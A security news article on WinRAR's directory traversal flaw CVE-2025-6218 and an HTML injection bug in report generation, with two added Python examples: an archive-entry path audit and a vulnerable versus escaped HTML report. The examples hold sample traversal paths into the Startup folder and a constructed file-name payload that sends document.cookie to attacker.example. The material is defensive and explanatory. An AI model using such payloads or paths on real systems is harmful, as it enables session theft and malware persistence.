Redazione RHC : 26 June 2025 19:19
WinRAR's developers have fixed a directory traversal vulnerability, tracked as CVE-2025-6218. Under certain circumstances, the bug allowed a file planted by a malicious archive to be executed after the archive was extracted.
The vulnerability carries a CVSS score of 7.8 and was discovered by a researcher using the handle whs3-detonator, who reported it through Trend Micro's Zero Day Initiative in early June 2025. It affects only the Windows builds, up to and including version 7.11; the fix shipped in WinRAR 7.12 beta 1, released this week.
“When extracting a file, older versions of WinRAR, RAR for Windows, UnRAR and UnRAR.dll, including the portable UnRAR source code, can use the path specified in a specially crafted archive instead of the path specified by the user,” the developers explain.
In other words, a malicious archive can carry entries whose relative paths have been crafted (for example with ".." components) so that WinRAR writes them outside the folder the user chose, into potentially dangerous locations such as system directories or autostart folders.
If the contents of such an archive are malicious, the extracted files can be run without any further user action: a file dropped into the Startup folder executes the next time the user logs in to Windows. Such programs run with the user's own rights rather than administrator or SYSTEM privileges, but that is still enough to steal sensitive data, including browser cookies and saved passwords, establish persistence on the victim's system, or give their operators remote access.
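The following is an added example, not WinRAR's own code: a pre-extraction audit that lists the entry names of an archive which would land outside the chosen destination folder, the pattern behind CVE-2025-6218. The destination path, the entry names and the in-memory archive are all constructed for illustration (ZIP is used because the Python standard library can write it; the name check itself is format-agnostic and applies equally to a RAR listing). The check is performed with Windows path rules regardless of the host platform, since that is where the bug applies.

```python
"""Added example (not WinRAR code): audit archive entry names before extraction."""
import io
import ntpath
import zipfile

# Constructed destination folder; the user believes everything goes here.
DEST = r"C:\Users\victim\Downloads\extract"

# Constructed entry names. The first two are benign; the rest are the kind
# of paths a malicious archive uses to drop files into autostart or system
# locations, spelt with either separator because Windows accepts both.
SAMPLE_ENTRIES = [
    "docs/readme.txt",
    r"bin\tool.exe",
    "../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.exe",
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe",
    r"docs\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe",
    r"C:\Windows\System32\drivers\etc\hosts",
    r"\\fileserver\share\update.exe",
]


def is_safe_entry(name: str, dest: str = DEST) -> bool:
    """True only if `name`, resolved against `dest` with Windows path rules,
    stays inside `dest`."""
    if not name or "\x00" in name:
        return False
    # Windows treats '/' and '\' alike, so normalise before checking.
    normalised = name.replace("/", "\\")
    # Drive-qualified, rooted or UNC names ignore `dest` entirely.
    drive, tail = ntpath.splitdrive(normalised)
    if drive or tail.startswith("\\"):
        return False
    # Resolve '..' the way the filesystem would and confirm the result is
    # still below the destination. Case-folding avoids C:\ vs c:\ mismatches.
    base = ntpath.normcase(ntpath.normpath(dest))
    full = ntpath.normcase(ntpath.normpath(ntpath.join(dest, normalised)))
    return full == base or full.startswith(base + "\\")


def unsafe_entries(names, dest: str = DEST) -> list:
    """Return the entry names that would escape `dest`."""
    return [n for n in names if not is_safe_entry(n, dest)]


def build_sample_archive() -> bytes:
    """Build an in-memory ZIP carrying SAMPLE_ENTRIES (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in SAMPLE_ENTRIES:
            zf.writestr(name, b"placeholder")
    return buf.getvalue()


def audit_archive(data: bytes, dest: str = DEST) -> list:
    """List the entries of an archive (as bytes) that must not be extracted.
    Only the raw names are inspected; nothing is written to disk."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return unsafe_entries(zf.namelist(), dest)


if __name__ == "__main__":
    for name in audit_archive(build_sample_archive()):
        print("REJECT:", name)
```

Run stand-alone, the script prints the five entries that would escape the extraction folder and stays silent about the two benign ones. The prefix comparison after normalisation is the check that matters; rejecting drive letters and UNC prefixes up front simply avoids relying on how a given path library treats them.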
In addition to CVE-2025-6218, WinRAR 7.12 beta 1 also fixes an HTML injection issue in report generation, reported by security researcher Marcin Bobryk. He explains that archive file names containing HTML markup could be embedded in the HTML report as raw HTML tags, which could lead to HTML and JavaScript injection when such a report is opened in a browser.
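The following is an added example, not WinRAR's code: a minimal HTML report generator in its vulnerable and hardened forms, showing how an archive entry name carrying markup ends up as live HTML in the report unless it is escaped. The entry names, including the attacker.example URL, are constructed.

```python
"""Added example (not WinRAR code): file-name injection into an HTML report."""
import html

# Constructed entry names; the last one is an injection attempt that would
# fire on load if the report were opened in a browser.
REPORT_ENTRIES = [
    "quarterly.xlsx",
    "notes <draft>.txt",
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">.pdf",
]


def render_report_vulnerable(names) -> str:
    """Interpolates file names into HTML as-is, so any markup in a name
    becomes live markup in the report."""
    rows = "".join(f"<tr><td>{name}</td></tr>" for name in names)
    return f"<html><body><table>{rows}</table></body></html>"


def render_report_hardened(names) -> str:
    """Escapes '<', '>', '&' and both quote characters so a name is rendered
    as text and never parsed as a tag or attribute."""
    rows = "".join(
        f"<tr><td>{html.escape(name, quote=True)}</td></tr>" for name in names
    )
    return f"<html><body><table>{rows}</table></body></html>"


def contains_injected_tag(report: str) -> bool:
    """Crude check: a '<' inside a table cell means entry-name markup reached
    the output unescaped."""
    cells = report.split("<td>")[1:]
    return any("<" in cell.split("</td>", 1)[0] for cell in cells)


if __name__ == "__main__":
    print("vulnerable:", contains_injected_tag(render_report_vulnerable(REPORT_ENTRIES)))
    print("hardened:  ", contains_injected_tag(render_report_hardened(REPORT_ENTRIES)))
```

The fix is the same one that applies to any untrusted string placed into HTML: escape at the point of output, in the context where the value is used (text node here; attribute and URL contexts need their own encoding).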